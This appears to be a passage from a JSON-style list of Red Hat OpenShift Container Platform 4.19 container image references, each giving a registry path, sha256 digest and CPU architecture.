"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
